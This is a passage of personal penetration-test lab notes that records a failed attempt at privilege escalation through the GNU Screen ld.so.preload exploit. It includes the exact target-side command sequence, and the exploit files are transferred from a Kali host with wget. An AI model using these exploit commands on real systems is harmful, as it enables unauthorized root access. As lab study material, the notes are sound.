- run `./screen-exploit.sh` on Kali ![[images/Pasted image 20260215184333.png]] - moves us to `/tmp` and creates both `/tmp/libhax.so` and `/tmp/roothsell` - serve up files from Kali ![[images/Pasted image 20260215184425.png]] - `wget` above files on target ![[images/Pasted image 20260215184540.png]] - Now, on the target, follow below command sequence ```bash cd /etc || exit 1 umask 000 screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" screen -ls /tmp/rootshell ``` - Still `barry` ![[images/Pasted image 20260215184807.png]] - Try again but move `libhax.so` and `rootshell` to `/tmp` - still `barry` ![[images/Pasted image 20260215185011.png]]